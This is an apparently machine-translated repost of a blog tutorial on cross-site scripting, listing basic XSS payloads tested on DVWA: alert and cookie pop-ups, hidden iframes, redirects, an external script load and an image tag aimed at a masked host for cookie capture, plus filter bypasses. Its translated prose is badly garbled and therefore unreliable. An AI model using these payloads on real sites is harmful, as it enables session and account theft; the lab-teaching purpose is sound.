XSSのクロスサイトスクリプティング攻撃

その他 2020-04-02 00:20:16 訪問数: null

XSSの紹介

順番にXSS(クロスサイトスクリプト)は、とても短いXSSをCSSスタイルとの混同を避けるために。
XSSは、Webアプリケーションは、多くの場合、コンピュータのセキュリティの脆弱性が、また、ほとんどの主流のWeb攻撃に表示されています。
XSSの手段は、サイト上のデータを提出する悪意のある人によって悪用ユーザー欠点をエスケープするか、フィルタリングではありませんし、その後行くためにWebページに埋め込まれたいくつかのコードを追加します。他のユーザのアクセスは、いくつかのアクションのユーザーIDとユーザー情報を盗むために適切な埋め込みコードを実行、またはウイルスへの訪問者の攻撃のためになります。

XSS攻撃の危険性が含まれます:
1。は、マシンのログインアカウントとして、ユーザーアカウントのすべての種類を盗むユーザーがオンラインバンキングのアカウント、管理者アカウントの様々な種類の
追加、読書を含む2.コントロールの企業データ、改ざん。機密データを削除する機能。
3.不正な転送は、ウェブサイトは、馬にリンクされている、電子メールを送信するために、被害者のマシンを制御するために強制的に
他のサイトを攻撃します。

主なカテゴリXSS

反射型XSS(XSS反射)、非永続的なクロスサイトスクリプティング攻撃として知られ、それはXSSの最も一般的なタイプであるが、注入データの脆弱性の原因、攻撃者は、応答に反映されます。典型的な非永続的なXSSは、XSS攻撃ベクトルとのリンクが含まれています(つまり、それぞれの攻撃にはクリックして、ユーザーが必要です)。

蓄積型XSS(XSSをストアド)、一般的にXSS攻撃ベクトルで発生も知られているように、永続型クロスサイトスクリプティング攻撃は、ユーザが記憶を実行する際にページが開かれたときに、サイトデータベースに(一般的にXSS攻撃コードを参照)。たびに、ユーザーがブラウザ、スクリプトの実行を開きます。ユーザーがページを開くたびに、スクリプトの内容を表示するために自動的に実行されますが、より危険なXSS攻撃の非永続的なXSSのタイプに比べて種類をラスティング。

XSSスクリプトの構造

1.一般的なHTMLのタグ
Augenstern
一般的にJavaScriptを使用2.方法
Augenstern
3.構造のXSSスクリプト
警告ポップアップ
スクリプト実現爆弾ボックスのプロンプトを、単一引用符で囲まれたSQLインジェクションの脆弱性テストに似た一般的な脆弱性テストやデモでの使用、として、このスクリプトは、あまりにも、一度に実行することができますそれは、バックエンドサーバーは、特殊文字をフィルタリングしていないことを意味し<> /ますが、ページの場所のXSSの脆弱性があることを証明できるようにします。私はそれを書き留め、結果の下にDVWA上で実行するコードが表示されます。

<script>alert('xss')</script>
<script>alert(document.cookie)</script>

最初の爆弾は、XSS言う成功した操作の結果ウィンドウた
Augenstern
セカンドランの結果がにクッキーを表示することができます
Augenstern
ページのネスティングを

<iframe src=https://zxcv0221.github.io width=300 height=300></iframe>
<iframe src=https://zxcv0221.github.io width=0 height=0 border=0></iframe>

最初の実行結果は、私はそれが私のGitHubのブログ、外出先にジャンプしてみましょう。
Augenstern
それの第二は、emmmmmm、私は、ネストされたページサイズが0で設定されているので、何も変更されます。
ページのリダイレクト

<script>window.location="https://zxcv0221.github.io"</script>
<script>location.href="https://zxcv0221.github.io"</script>

最初の結果はまだちょっと、私のブログのホーム・ページを実行することは勿論です。Augenstern
第一及び第二の実行と同じ結果。

ポップ警告とリダイレクト

<script>alert("欢迎来到我的博客网站");location.href="https://zxcv0221.github.io"</script>

これは、ウィンドウを再生し、私のブログページにロードすることができます。
Augenstern
ここで私は再び私のブログのジャンプを決定するポイントです。
アクセス悪意のあるコード

<script src="http://*********/xss.js"></script>

見てはいけない、私はこのようなものを持っていないが、また見に。Augenstern
イメージタグを使用します

<img src="#" onerror=alert('xss')>/*与上面的<script>标签相比有什么优点可以体会一下。嘿嘿*/
<img src="javascript:alert('xss');">/*也可以弹窗*/
<img src="http://**********.***"></img>/*可以放你想引导到什么网站,可以得到用户cookie,至于放什么照片,照片参数都可以自己设定。*/

フィルタスクリプトをバイパス
:ケース<ScrIpT>alert('xss')</ScRipt>
などURL、base64エンコーディングを使用して、文字エンコーディングを

<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;">小弹窗</a>

セカンドランの結果:ハイパーリンク
Augenstern
そのXSSの全ての反射以上。
ストレージのXSSより危険なタイプ、リスクは反射型XSSの範囲よりもはるかに大きいです。
OK、ここに停止します。
私は滑っ..................

Augenstern

Augenstern⁣⁡⁢?⁠ㅤ
公開された26元の記事 ウォン称賛12 ビュー3223
プライベートの手紙の 懸念

おすすめ

転載: blog.csdn.net/qq_45836474/article/details/104910481
おすすめ
Arc Browser for Windows 1.0 が正式に提供開始
1990 年代生まれのプログラマーがビデオ移植ソフトウェアを開発し、1 年足らずで 700 万以上の利益を上げました。結末は非常に懲罰的でした。
ランキング
パフォーマンスプロファイラを実装する機能のようなCPPマクロ| C ++コードのパフォーマンステストを簡素化するためにマクロを使用する方法
クリック率を推定するための「特効薬」はありませんが、モデル構造よりも重要なことは何ですか?
Flink的重启策略(RestartStrategy)实战
Implementado en base a la tecnología de reconocimiento de huellas de voz Qualcomm SOC
Android custom encryption and decryption for playing audio and video (m3u8 independent encryption)
Oracleマルチテーブル結合クエリ、統計的合計、グループ化
MapReduceのワークフローと動作原理
ボタンを複数回押したときはどうすればサウンドのオーバーラップをすることができますか?
導出と理解SVM
Mac に Appium をインストールする
アーカイブ
もっと
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(35)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(31)
2024-04-24(30)

コードワールド

© 2018 codetd.com